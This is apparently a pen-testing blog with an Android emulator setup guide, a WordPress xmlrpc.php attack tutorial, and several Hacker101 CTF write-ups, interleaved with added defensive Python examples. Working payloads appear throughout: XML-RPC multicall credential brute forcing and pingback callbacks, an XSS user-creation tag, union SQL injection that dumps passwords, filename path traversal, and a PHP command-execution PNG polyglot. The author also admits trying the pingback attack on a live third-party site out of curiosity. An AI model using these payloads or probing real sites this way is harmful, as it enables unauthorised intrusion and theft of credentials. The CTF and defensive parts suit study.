Steps to set up an Android Simulator for Pen-testing

Hello everyone, today we will be learning how to set up an Android simulator on your own computer. We will keep updating this post whenever we change or modify our installation process.

The software we will be using (for now):

  • Genymotion

The desktop virtualization software we are using is VirtualBox on Windows (VirtualBox is also available for Linux distributions).

Step 1: Installation of Genymotion on your host. Here is the documentation if you need it.
  1. First, create an account with Genymotion Desktop here.
  2. After validating your account, go to the installation page.
  3. On the installation page, choose the relevant package to download for your OS (Windows, Linux, Mac).
  4. For Windows, there are 2 executable files you can download and install with just a few clicks.
    1. The first executable contains both the Genymotion Desktop application and VirtualBox; if you have not installed VirtualBox on your host yet, this one is more convenient because it installs both at once.
    2. The other executable contains only the Genymotion Desktop application, for hosts where VirtualBox is already installed.
  5. For Linux distributions,
    1. You have to install VirtualBox and the Genymotion Desktop application separately.
    2. If you are using a Linux distribution, I will assume you know how to install VirtualBox on your host machine. If you don’t, here is the link with the steps to install VirtualBox on a Linux distribution.
    3. For the Genymotion installation, you will get a binary file that you have to make executable with chmod before running it:
sudo chmod +x genymotion-3.0.4-vbox
Step 2: Running Genymotion on your host machine
  1. On Windows, double click to run the application. On a Linux distribution, go to the path where Genymotion is installed and type “./genymotion” to start the application.
  2. At the login screen, input your username and password, then click ‘NEXT’.
  3. You will reach the part where it asks you for a license key, but you can just opt for “Personal Use”.
  4. You will then jump to the EULA (End User License Agreement); read through it and accept the agreement.
  5. Click ‘NEXT’ and you will arrive at the main panel where you can choose the available templates.

We have finished installing Genymotion on our host machine. The next part will be installing Santoku in VirtualBox. Why use the Santoku Linux OS? Because it is built for a mobile security pen-testing lab; you can also use Kali Linux. At this point, I will assume that you know how to set up a virtual machine in VirtualBox, so I will not go through how to set up Santoku in VirtualBox.

So, this is the end of the post. Hope you have a nice day.

Author: Bs & Derek.

Exploiting the xmlrpc.php

What is XML-RPC?

XML-RPC is an API that wraps information or data into an XML document and sends it to a mobile app or remote software. It was introduced in the days when internet connections were slow: instead of writing online, users wrote their content offline and published it all together through the API. As internet services improved, most of us stopped using the feature, and it was often forgotten.

What are the vulnerabilities?

  1. Brute force attack. The main reason this attack works is that the API does not cap login attempts on the site. Attackers may not get the correct credentials, but they still cause problems such as overloading the site, so its availability is affected.
  2. Intercepting/stealing login information. There is no separate authentication layer: each time the user accesses the website through the API, the login credentials are sent inside the XML form. If the connection is intercepted (MITM), the XML data is exposed in clear text.
  3. XMLRPC pingback.ping. An attacker can use this method to retrieve the real public address of the WordPress site.

⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️

Before I begin to show you the detailed steps for carrying out the following attacks: any illegal action you have performed is on your own. I am not responsible for any of your actions. Please set up your own environment to do so, or ask for permission before doing it.

⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️

XMLRPC attack using Burpsuite

First, check whether xmlrpc.php is accessible on the target site. In this case, I have set up a demo WordPress site to carry out the attack. [THIS DEMO SITE IS INSTALLED & SET UP ON A VIRTUAL MACHINE]

Using the GET method to retrieve the file, we will normally get this result:

“XML-RPC server accepts POST requests only.”

Next, we will send a POST request to retrieve all the usable methods on the XMLRPC server.

POST /xmlrpc.php/ HTTP/1.1
Host: 192.168.220.137
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-SG,en-US;q=0.9,en;q=0.8
Connection: close
Content-Length: 137

<?xml version="1.0" encoding="utf-8"?> 
<methodCall> 
<methodName>system.listMethods</methodName> 
<params></params> 
</methodCall>

The server will reply with a list of methods that can be used. In this case, we are particularly interested in the pingback.ping method. One thing to take note of: all the data coming in and out uses the XML format explained above, so make sure that the data format is correct.

To carry out the attack, we need to prepare these 2 things first:

  1. A valid webhook.site URL, or any alternative you prefer such as beeceptor or postbin.
  2. A valid URL of a post on the targeted WordPress site.

<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>[webhook URL]</string></value>
</param>
<param>
<value><string>[Any blog post URL]</string></value>
</param>
</params>
</methodCall>

Below is another example of this attack, carried out on this WordPress site. YES! The one you are looking at right now. Out of curiosity, I wanted to try attacking the real site instead of the one I hosted. [THIS IS THE ONLINE-HOSTED VERSION OF WORDPRESS]

As you can see, this attack is unsuccessful and no result is shown in the postbin. It seems they took precautions to protect the online WordPress site. This method is useful against self-hosted sites that have not disabled xmlrpc.php.

If you do not wish to use POSTBIN, opening nc in listening mode works as well! 👍👍

Brute force attack using XMLRPC.php

As mentioned above, there is no limit on the number of tries, so getting a successful username and password combination is just a matter of time. There is also no mechanism like account lockout after a certain number of tries.

<?xml version="1.0"?>
<methodCall><methodName>system.multicall</methodName><params><param><value><array><data>

<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>[username]</string></value><value><string>[password]</string></value></data></array></value></data></array></value></member></struct></value>

</data></array></value></param></params></methodCall>
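The two request shapes shown above (a pingback.ping with an attacker-chosen source URL, and a system.multicall carrying wp.getUsersBlogs credential checks) are exactly what a defender wants to recognise in traffic to xmlrpc.php. The following is an added example, not code from the post: a small stdlib-only classifier that parses a POST body and returns a risk verdict. The host set, the method list, the multicall threshold and all sample bodies are constructed assumptions; the multicall sample packs three login attempts into one request, which generalises the single-call body above (one HTTP request can test many credential pairs, so the check counts them).

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed assumptions for this example: the site does not use pingbacks at
# all, and this many authenticating calls inside one system.multicall is
# treated as credential guessing.
PINGBACKS_ALLOWED = False
AUTH_METHODS = {"wp.getUsersBlogs", "wp.getUsers", "wp.getProfile", "wp.getPosts"}
MULTICALL_LOGIN_THRESHOLD = 3


def parse_method_call(body):
    """Parse an XML-RPC request body; return (methodName, root element).

    xml.etree does not resolve external entities, but a production filter
    should still parse untrusted XML through defusedxml.
    """
    if isinstance(body, str):
        body = body.encode("utf-8")
    root = ET.fromstring(body)
    if root.tag != "methodCall":
        raise ValueError("not an XML-RPC methodCall")
    return (root.findtext("methodName") or "").strip(), root


def multicall_methods(root):
    """Inner methodName values of a system.multicall request, in order."""
    names = []
    for member in root.iter("member"):
        if (member.findtext("name") or "").strip() == "methodName":
            names.append((member.findtext("value/string") or "").strip())
    return names


def classify_xmlrpc_request(body):
    """Return {'method', 'risk', 'reason'} for one POST body sent to xmlrpc.php."""
    name, root = parse_method_call(body)
    verdict = {"method": name, "risk": "low", "reason": "no risky pattern"}
    if name == "pingback.ping":
        # params are (sourceURI, targetURI); the server fetches sourceURI to verify
        # the link, which is how an attacker-chosen host learns the site's real address.
        strings = [(s.text or "").strip() for s in root.iter("string")]
        source = strings[0] if strings else ""
        target = strings[1] if len(strings) > 1 else ""
        if not PINGBACKS_ALLOWED:
            host = urlparse(source).hostname or ""
            verdict.update(risk="high",
                           reason=f"pingback.ping from {host!r} to {target!r}; pingbacks are disabled")
    elif name == "system.multicall":
        auth_calls = sum(1 for m in multicall_methods(root) if m in AUTH_METHODS)
        if auth_calls >= MULTICALL_LOGIN_THRESHOLD:
            verdict.update(risk="high", reason=f"{auth_calls} authenticating calls in one multicall")
        elif auth_calls:
            verdict.update(risk="medium", reason=f"{auth_calls} authenticating call(s) via multicall")
    return verdict


# Constructed sample bodies, shaped like the requests in the write-up.
LIST_METHODS_REQUEST = """<?xml version="1.0" encoding="utf-8"?>
<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>"""

PINGBACK_REQUEST = """<?xml version="1.0" encoding="UTF-8"?>
<methodCall><methodName>pingback.ping</methodName><params>
<param><value><string>http://collector.example.invalid/hook</string></value></param>
<param><value><string>http://192.168.220.137/?p=1</string></value></param>
</params></methodCall>"""

_INNER = ("<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>"
          "<member><name>params</name><value><array><data><value><array><data>"
          "<value><string>{u}</string></value><value><string>{p}</string></value>"
          "</data></array></value></data></array></value></member></struct></value>")
MULTICALL_REQUEST = ('<?xml version="1.0"?><methodCall><methodName>system.multicall</methodName>'
                     "<params><param><value><array><data>"
                     + "".join(_INNER.format(u="admin", p=p) for p in ("admin", "password", "123456"))
                     + "</data></array></value></param></params></methodCall>")

if __name__ == "__main__":
    for body in (LIST_METHODS_REQUEST, PINGBACK_REQUEST, MULTICALL_REQUEST):
        print(classify_xmlrpc_request(body))
```

The verdict is meant to feed a WAF rule or a log alert in front of xmlrpc.php; a site that does not need pingbacks or multicall is better served by disabling the endpoint outright, as in the Prevention section below.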

To show the difference between a successful and an unsuccessful login, here is an example.

And of course, you should be using Intruder to perform this kind of brute force attack.

First, check the attack target; in my case I will be using the IP address of my site.

We need to set the Payload Positions and choose ‘Cluster bomb’ in the Attack type list. A good resource to read up on positions and attack types: [ https://portswigger.net/burp/documentation/desktop/tools/intruder/positions ]

Here, we need to set 2 payload positions, ‘username’ and ‘password’. Next, we need to set the word lists. This is the documentation for Payload types: [ https://portswigger.net/burp/documentation/desktop/tools/intruder/payloads/types ]

Click ‘Start attack’ when you are ready.

As we can observe, one of the requests has a different length, and when we check the raw data under the response tab, it shows us that this combination has successfully logged in.

Prevention

  1. Install a plugin, for the lazy people: [ https://wordpress.org/plugins/disable-xml-rpc/ ]
  2. Disable xmlrpc.php using .htaccess:

# Deny anyone to access the file
<Files xmlrpc.php>
order deny,allow
deny from all
</Files>

That’s it!! Thanks for taking the time to read this long post. See you next post ¯\_(ツ)_/¯

7/Jan/2020 — > Just a small Add-On

My partner and I wrote this script for fun. Change the variables if needed; we did not polish the user input handling.

https://drive.google.com/open?id=1AyNGfBF5YvvGQdF3Di762H5NIkXOyoGT

Hacker101 – H1 Thermostat

Hi guys hope you are having a nice day.

The CTF we will be doing is an Android APK, so we have to decompile it to analyse the source code.

Overview:

  • H1 Thermostat
  • Level: Easy
  • Total Flags: 2

After decompiling the APK, first look at AndroidManifest.xml; this XML file will tell you what the package is and where the main activity is.

Here we know the source code is in the “com/hacker101/level11” directory.

First we take a look at the main code, which is “ThermostatActivity.java”. There was nothing much apparently; the only thing that caught my eye was that it imports “ThermostatModel.java”.

Next we take a look at “ThermostatModel.java”. There was no sign of flags, but again it imports another Java file from the same subfolder, “PayloadRequest.java”.

Now, looking at the source code of “PayloadRequest.java”, we discover 2 FLAGS in one of the code blocks, and the FLAGS we discovered are FLAG 0 & 1.

I was like damn, that was fast, so here is a picture of both flags.

That’s all folks, see ya 🙂

Author: Derek

Hacker101 – Ticketastic

Onto another CTF in Hacker101, Ticketastic: Live Instance.

I will go straight to the point. After playing around with the demo instance, I found out that the website is vulnerable to XSS when submitting an XSS script via the ‘Submit a Ticket’ page. And the hint given to us is “This level and the Ticketastic demo instance are running the same code”.

That means both the live and demo instances are the same in terms of functionality, so the live instance is also vulnerable to XSS.

Going to the live instance, we tried to log in as admin like we did in the demo instance, but it gives us an invalid password, so we have to create a user within the web application without being the ‘admin’ to get into the web page.

Here is where we exploit the XSS vulnerability in this web application, by submitting an XSS script on the ‘Submit a Ticket’ page, hoping the script will run when someone clicks on it or when the page loads.

If you have created a new user in the demo instance, you would have realized that the ‘newUser’ page uses the GET method to create a new user, so you can see the parameters used to create the user. Thus, we can make use of them in our script to add a new user when the page is loaded.

Here is the script that I have created.

<a onload="http://localhost/newUser?username=user1&password=user1&password2=user1">

This is how it should look on the submit ticket page.

Go to the login page and enter the username and password. You will be able to see a link referring to the FLAG.

Click on the link and it will direct us to the page where the flag is.
FLAG 0

Moving on to the next FLAG…

We have discovered another vulnerability in the web application, which is SQL injection on the ‘ticket’ page. Knowing that we need to log in as ‘admin’ to get the next FLAG is most likely the case here. Another thing to note is that the number of columns is 3, because the first query selects 3 columns, so subsequent queries have to select 3 columns as well.

I tried to enumerate the database first, using the following query:

0 union select version(), database(), null --

The result confirmed that it is not a blind SQL injection and that the database returns the intended result to us.

Let’s enumerate the tables in the database:

0 union select group_concat(table_name),null,null from information_schema.tables where table_schema=database() --

The result lists the tables. Knowing that the first table, “tickets”, stores all the users’ submissions, we can confirm that the other table, “users”, is where the usernames and passwords are stored. Now we need to find out the column names of the table ‘users’:

0 union select null,group_concat(column_name),null from information_schema.columns where table_name='users' --

The result lists the columns. Finally, we can find out the password of the admin:

0 union select username, password, null from users --

To our surprise, the second flag was actually the password for the admin account.

FLAG 1
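The ticket page takes the ticket id straight into the SQL text, which is why a value of the form "0 union select …" can pull rows out of the users table once the column count (3) matches. The following is an added example, not the CTF's code: an in-memory SQLite stand-in for the tickets/users schema, the vulnerable lookup beside a parameterised one, and an output-encoding helper for the ticket page that neutralises markup like the one submitted above. The schema, row contents and admin password are constructed.

```python
import html
import sqlite3


def make_demo_db():
    """In-memory stand-in for the CTF schema (constructed: a 3-column tickets table and users)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE tickets (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO tickets VALUES (1, 'Printer broken', 'Please fix it');
        INSERT INTO users VALUES ('admin', 'constructed-admin-password');
    """)
    return conn


def vulnerable_lookup(conn, ticket_id):
    # The id is pasted into the SQL text, so "0 union select username, password, null
    # from users --" becomes part of the statement and the UNION returns user rows.
    sql = f"SELECT id, title, body FROM tickets WHERE id = {ticket_id}"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, ticket_id):
    # Validate the type first, then bind the value: the database receives an
    # integer parameter, never SQL text, so there is nothing to UNION onto.
    try:
        tid = int(ticket_id)
    except (TypeError, ValueError):
        return []
    return conn.execute("SELECT id, title, body FROM tickets WHERE id = ?", (tid,)).fetchall()


def render_ticket(title, body):
    # Output encoding for the ticket page: any tag submitted in a ticket is shown as text.
    return f"<h1>{html.escape(title)}</h1><p>{html.escape(body)}</p>"


# The same union-based input the write-up used against the 'ticket' page.
INJECTION = "0 union select username, password, null from users --"

if __name__ == "__main__":
    db = make_demo_db()
    print("vulnerable:", vulnerable_lookup(db, INJECTION))
    print("safe:      ", safe_lookup(db, INJECTION))
    print(render_ticket("Hello", '<a onload="http://localhost/newUser?username=user1">'))
```

The SQLite functions differ from MySQL (no group_concat over information_schema here), but the UNION mechanics and the fix are the same: the parameterised version returns no rows for the injected string because the value never reaches the SQL parser.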

And we have come to the end of the post. Thank you for reading and feel free to leave a comment.

Author: Derek

Hacker101 – Intentional Exercise

Hi guys, a brand new day means a brand new CTF for us to do 🙂

For today, we will be looking through an Android APK. Same as the ‘Hello World!’ CTF, in order to know how the application works, we have to decompile it and look through the source code.

I decompiled the Android APK, unzipped it and got a bunch of folders and AndroidManifest.xml. The first hint given to me was “check the manifest”.

I opened up AndroidManifest.xml and looked at the source.

The package name is “com.hacker101.level13”, and there is one line that says where the main activity is.

Going back to the file explorer, the folder ‘sources’ should tell you that’s where the source code is. Click on the ‘sources’ folder; inside are additional folders, ‘android’, ‘androidx’ and ‘com’.

Remember the main code is at ‘com.hacker101.level13.MainActivity’, which can be represented as the path ‘sources/com/hacker101/level13/MainActivity’ where the source code is.

Under the ‘level13’ folder, there are 3 Java files.

‘MainActivity.java’ is the one we want to look at. So here is the source code…

package com.hacker101.level13;

import android.net.Uri;
import android.os.Bundle;
import android.support.v7.app.AppCompatActivity;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import java.math.BigInteger;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

public class MainActivity extends AppCompatActivity {
    /* access modifiers changed from: protected */
    public void onCreate(Bundle bundle) {
        super.onCreate(bundle);
        setContentView((int) R.layout.activity_main);
        WebView webView = (WebView) findViewById(R.id.webview);
        webView.setWebViewClient(new WebViewClient());
        Uri data = getIntent().getData();
        String str = "http://34.94.3.143/e6474d3ac4/appRoot";
        String str2 = BuildConfig.FLAVOR;
        if (data != null) {
            str2 = data.toString().substring(28);
            StringBuilder sb = new StringBuilder();
            sb.append(str);
            sb.append(str2);
            str = sb.toString();
        }
        if (!str.contains("?")) {
            StringBuilder sb2 = new StringBuilder();
            sb2.append(str);
            sb2.append("?");
            str = sb2.toString();
        }
        try {
            MessageDigest instance = MessageDigest.getInstance("SHA-256");
            instance.update("s00p3rs3cr3tk3y".getBytes(StandardCharsets.UTF_8));
            instance.update(str2.getBytes(StandardCharsets.UTF_8));
            String format = String.format("%064x", new Object[]{new BigInteger(1, instance.digest())});
            StringBuilder sb3 = new StringBuilder();
            sb3.append(str);
            sb3.append("&hash=");
            sb3.append(format);
            webView.loadUrl(sb3.toString());
        } catch (NoSuchAlgorithmException e) {
            e.printStackTrace();
        }
    }
}

By looking at the source code, we can identify that the variable ‘str’ contains the URL value “http://34.94.3.143/e6474d3ac4/appRoot”. I entered the URL into the address bar and the web page returned me a link to the ‘Flag’.

Once I clicked on the link to the ‘Flag’, I got an ‘invalid request’ message, so since I was stopped in my tracks again, it was time to look at the source code for more clues.

Looking at the next few lines of code:

String str = "http://34.94.3.143/e6474d3ac4/appRoot";
String str2 = BuildConfig.FLAVOR;
if (data != null) {
    str2 = data.toString().substring(28);
    StringBuilder sb = new StringBuilder();
    sb.append(str);
    sb.append(str2);
    str = sb.toString();
}
if (!str.contains("?")) {
    StringBuilder sb2 = new StringBuilder();
    sb2.append(str);
    sb2.append("?");
    str = sb2.toString();
}

Knowing the value of ‘str’, we have to look at the variable ‘str2’. I can assume that the value of ‘str2’ is “/flagBearer”, why? First, I inserted ‘/’ after ‘appRoot’ in the URL and got the error message ‘Not Found’. Secondly, the new variable ‘str’ is made of the old variable ‘str’, ‘str2’ and ‘?’.

Looking at the previous URL “http://34.94.3.143/e6474d3ac4/appRoot/flagBearer” that gave the error message “Invalid request”, I added “?” after the URL. The result: I still got the error message “Invalid request” instead of “Not Found”.

Thus, this proves that the value of the variable ‘str2’ is “/flagBearer”.

Hence, the whole URL string is…

String str = "http://34.94.3.143/e6474d3ac4/appRoot/flagBearer?"

We can conclude that:

Now let’s take a look at the last block of code:

try {
    MessageDigest instance = MessageDigest.getInstance("SHA-256");
    instance.update("s00p3rs3cr3tk3y".getBytes(StandardCharsets.UTF_8));
    instance.update(str2.getBytes(StandardCharsets.UTF_8));
    String format = String.format("%064x", new Object[]{new BigInteger(1, instance.digest())});
    StringBuilder sb3 = new StringBuilder();
    sb3.append(str);
    sb3.append("&hash=");
    sb3.append(format);
    webView.loadUrl(sb3.toString());
} catch (NoSuchAlgorithmException e) {
    e.printStackTrace();
}

This block of code has a secret key ‘s00p3rs3cr3tk3y’ which is put through the SHA-256 hashing algorithm to produce a hash string. So, basically, the web application checks the hash value in order for the flag to be shown.

But before the secret key is put through the hashing algorithm, another string value is appended to it: the value of the variable ‘str2’.

Now we know that the secret key plus the value of ‘str2’ is “s00p3rs3cr3tk3y/flagBearer”. The following line is where the variable ‘format’ stores the hash string.

String format = String.format("%064x", new Object[]{new BigInteger(1, instance.digest())});

Afterwards, the next four lines of code are very important, as they tell us the whole URL string that can give us the ‘FLAG’ value.

sb3.append(str);
sb3.append("&hash=");
sb3.append(format);
webView.loadUrl(sb3.toString());

The variable ‘sb3’ is a string builder to which the new variable ‘str’ is appended.

sb3 = "http://34.94.3.143/e6474d3ac4/appRoot/flagBearer?"

Then, it appends the string “&hash=”.

sb3 = "http://34.94.3.143/e6474d3ac4/appRoot/flagBearer?&hash="

Finally, it appends the value of the variable ‘format’. So, knowing that the string is ‘s00p3rs3cr3tk3y/flagBearer’, I put it through the SHA-256 hashing algorithm to produce the hash value, which is “8743a18df6861ced0b7d472b34278dc29abba81b3fa4cf836013426d6256bd5e”.

So at the end the URL should look like this:

sb3 = "http://34.94.3.143/e6474d3ac4/appRoot/flagBearer?&hash=8743a18df6861ced0b7d472b34278dc29abba81b3fa4cf836013426d6256bd5e"
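The URL construction above is easy to get subtly wrong when reproducing it outside Java (two MessageDigest.update calls, and a BigInteger printed with %064x). The following is an added example, not the app's code or the author's, that reproduces the derivation in Python so the hash can be checked locally; APP_ROOT and SECRET_KEY are the literals from the decompiled MainActivity, and the function names are my own.

```python
import hashlib

APP_ROOT = "http://34.94.3.143/e6474d3ac4/appRoot"   # value of `str` in MainActivity
SECRET_KEY = "s00p3rs3cr3tk3y"                          # hard-coded key shipped inside the APK


def java_style_hash(key, suffix):
    """Mirror MessageDigest.update(key); update(suffix); String.format("%064x", BigInteger(1, digest))."""
    digest = hashlib.sha256()
    digest.update(key.encode("utf-8"))      # successive update() calls hash the concatenation
    digest.update(suffix.encode("utf-8"))
    # BigInteger(1, bytes) is the unsigned big-endian value of the digest; %064x pads it
    # with leading zeros, giving the same 64 lowercase hex chars as hexdigest() would.
    return "%064x" % int.from_bytes(digest.digest(), "big")


def sha256_hex(text):
    """Reference value: plain SHA-256 of the concatenated string."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def build_signed_url(str2):
    """Rebuild the URL the WebView loads for a given str2 (the path appended to appRoot)."""
    url = APP_ROOT + str2
    if "?" not in url:           # the app appends '?' only when the URL has no query yet
        url += "?"
    return url + "&hash=" + java_style_hash(SECRET_KEY, str2)


if __name__ == "__main__":
    print(build_signed_url("/flagBearer"))
```

The hash is not a secret at all from a security standpoint: the key is a string constant in the APK, so anyone holding the app can sign any path, which is exactly what this level demonstrates. A server that needs to trust a client-supplied hash would have to keep the key out of the client entirely.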

Take the URL and load it. It will give us the flag we need.

Alright, that’s all folks; hope you have fun solving the flag. Have a nice day 🙂

Author: Derek

Hacker101 – TempImage

I will be doing TempImage CTF on Hacker101 today, enjoy.

Hints given:

  • File uploads can be hard to pin down
  • What happens to your filename when you see an uploaded file?
  • What if you make a small change to the path?

As usual, check the source page first. Just mess around with the site to collect as much information as you can.

So, here we are given the ability to upload only PNG images, and a strange string is added before our filename.

Let’s try to access the ‘files’ directory.

Hmm… So, let’s look at the hints. The third hint tells us to try changing the path a bit. Let’s capture the traffic and see what we can do.

Notice this at the end of the traffic: the PNG file is going to be displayed as we saw, and the filename is carried in the Content-Disposition header.

What is Content-Disposition? https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Disposition

What if we make a little change to it, maybe add an extra path segment?

That is our first flag! 😋😋

As we can observe, the original file path should be

-> files/0391bdcddadeb18297f5a8c7adc23ab4_wall.PNG

but after making the change in Burp Suite

-> files/0391bdcddadeb18297f5a8c7adc23ab4_../wall.PNG

we actually changed where the PNG is saved on the server.

Flag 1: Found

Disclaimer: Once again, I was unable to solve the flag completely on my own. I read lots of other people’s write-ups to understand the process of solving it. Still, I will demonstrate my way of doing it. https://github.com/testerting/hacker101-ctf/tree/master/tempimage/flag1

Hints given:

  • It clearly wants one specific format
  • If you can’t bypass that check, what can you do?
  • Read up on PNG chunks

These are the 3 files we need to help us solve Flag 1. 👨🏻‍💻👨🏻‍💻

<copy.bat>
copy wall.png/b + command.php new.png

<command.php>
<?php system("ls"); ?>

<wall.png>

In command.php, instead of uploading a webshell like that guy did in his walk-through, I want to do something simple like RCE.

Executing copy.bat will produce new.png.

All good? Let’s upload the PNG to the server and capture the traffic using Burp Suite.

Allow me to explain why you need to change the extension of ‘new.png’ to ‘new.php’. As the hint says, this upload only allows PNGs to be uploaded. But changing the extension did not stop us from getting Flag 0. It means the server does not check the file extension; instead it checks the file header to determine whether the file is a PNG or not. The second reason is that if we don’t use the PHP extension, our malicious command inside the PHP tag will not be executed.
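Both flags come from the same two server-side gaps: the prefixed filename is still joined to a client-controlled path (Flag 0), and "is it a PNG?" is decided by the 8-byte signature alone, so a file with PHP appended after IEND passes (Flag 1). The following is an added example, not the CTF's code, showing what the upload handler should do instead: a filename check that refuses anything but a bare name inside the upload directory, and a PNG validator that walks every chunk, verifies each CRC and rejects trailing bytes after IEND. The minimal 1x1 PNG and the polyglot built from it are constructed inline, mirroring the copy /b concatenation above.

```python
import os
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def safe_upload_path(upload_dir, client_filename, prefix):
    """Return the path an upload may be written to, or None if the name is unsafe.

    The client-supplied name must be a bare file name (no separators, no '..'),
    and the prefixed result must still resolve inside upload_dir.
    """
    name = client_filename
    if name in ("", ".", "..") or name != os.path.basename(name.replace("\\", "/")):
        return None
    candidate = os.path.join(upload_dir, f"{prefix}_{name}")
    root = os.path.realpath(upload_dir)
    if os.path.commonpath([root, os.path.realpath(candidate)]) != root:
        return None
    return candidate


def _chunk(ctype, payload):
    """Encode one PNG chunk: length, type, data, CRC-32 over type+data."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return len(payload).to_bytes(4, "big") + ctype + payload + crc.to_bytes(4, "big")


def make_minimal_png():
    """Constructed 1x1 8-bit greyscale PNG used as sample input."""
    ihdr = (1).to_bytes(4, "big") + (1).to_bytes(4, "big") + bytes([8, 0, 0, 0, 0])
    idat = zlib.compress(b"\x00\x00")          # one scanline: filter byte + one pixel
    return PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def validate_png(data):
    """Walk the chunk list and return (ok, reason); anything after IEND is rejected."""
    if not data.startswith(PNG_SIGNATURE):
        return False, "missing PNG signature"
    pos, first = len(PNG_SIGNATURE), True
    while True:
        if pos + 8 > len(data):
            return False, "truncated chunk header"
        length = int.from_bytes(data[pos:pos + 4], "big")
        ctype = data[pos + 4:pos + 8]
        if first and ctype != b"IHDR":
            return False, "first chunk is not IHDR"
        first = False
        start, end = pos + 8, pos + 8 + length
        if end + 4 > len(data):
            return False, f"truncated {ctype.decode('latin-1')} chunk"
        expected = int.from_bytes(data[end:end + 4], "big")
        if zlib.crc32(ctype + data[start:end]) & 0xFFFFFFFF != expected:
            return False, f"bad CRC in {ctype.decode('latin-1')} chunk"
        pos = end + 4
        if ctype == b"IEND":
            break
    if pos != len(data):
        return False, f"{len(data) - pos} trailing bytes after IEND"
    return True, "ok"


# Constructed: same layout as `copy wall.png/b + command.php new.png` in the write-up.
POLYGLOT = make_minimal_png() + b'<?php system("ls"); ?>'

if __name__ == "__main__":
    print(validate_png(make_minimal_png()))
    print(validate_png(POLYGLOT))
    print(safe_upload_path("files", "wall.PNG", "0391bdcddadeb18297f5a8c7adc23ab4"))
    print(safe_upload_path("files", "../wall.PNG", "0391bdcddadeb18297f5a8c7adc23ab4"))
```

The chunk walk only catches data appended after IEND; a payload placed inside a valid ancillary chunk (the "read up on PNG chunks" hint) still parses as a correct PNG, so the stored file must also keep a fixed image extension and live in a directory the web server never executes.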

Clicking the redirection button will bring us to the next page.

As we can see, the ‘ls’ command has been executed successfully. Now, we just need to change the command to help us find the flag.

Change the command in Burp Suite:

<?php system("cat index.php | grep FLAG"); ?>

Here you go, that is your Flag 1. 🚩🚩

There are other ways to solve this as well, like changing the PNG chunks and putting the commands in there or something. I was unable to do that, because I don’t really understand PNG chunks. 😂😂😂😂

Thanks for reading, see you in the next post. (☞゚ヮ゚)☞ ☜(゚ヮ゚☜)

Hacker101 – “Hello World!”

Hi guys!!! Happy 2020 to you all. Hope you have a new year resolution to solve CTF ahahahah (just joking).

Today, we will be doing Hacker101 CTF “Hello World!”.

So, based on the website, there is an input box ‘STDIN’ and a link to download a vulnerable binary program.

The first hint given for this CTF is “What does the application do?”.

I played around with the input box by inserting special characters and random words. The web application prints out the exact word or special character inserted into the input box.

What’s next? I went to download the binary program called ‘vulnerable’ and executed it, but nothing happened. So I knew that I had to debug the binary program.

But first I needed to find out the details of the vulnerable binary program.

Here is some of the information that I found:

# file vulnerable
vulnerable: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=ea1000564e33f4ad1901ebfe81bfc1fb3ea38fa2, not stripped
# readelf -h vulnerable
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Advanced Micro Devices X86-64
  Version:                           0x1
  Entry point address:               0x4005b0
  Start of program headers:          64 (bytes into file)
  Start of section headers:          6808 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         9
  Size of section headers:           64 (bytes)
  Number of section headers:         30
  Section header string table index: 29

Based on the information given above, I found out that the program is an ELF executable file. ELF stands for Executable and Linkable Format, also known as Extensible Linking Format. It is a common file format for executable files, object code, shared libraries and core dumps.
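Every value readelf -h printed above lives in the first 64 bytes of the file, and two of them matter for the rest of this write-up: the entry point, and the type EXEC, which means the binary is loaded at a fixed address so the code addresses gdb shows are stable. The following is an added example, not the CTF's code: a parser for the ELF64 header that returns those fields; the sample header is constructed from the readelf values above, and the function names are my own.

```python
import struct

# ELF64 header layout: e_ident[16], then the fixed-width fields readelf -h prints.
ELF64_HEADER_LE = struct.Struct("<16sHHIQQQIHHHHHH")   # 64 bytes, little-endian
ELF64_HEADER_BE = struct.Struct(">16sHHIQQQIHHHHHH")
E_TYPES = {1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}


def parse_elf64_header(data):
    """Parse the first 64 bytes of an ELF64 file into the fields readelf -h shows."""
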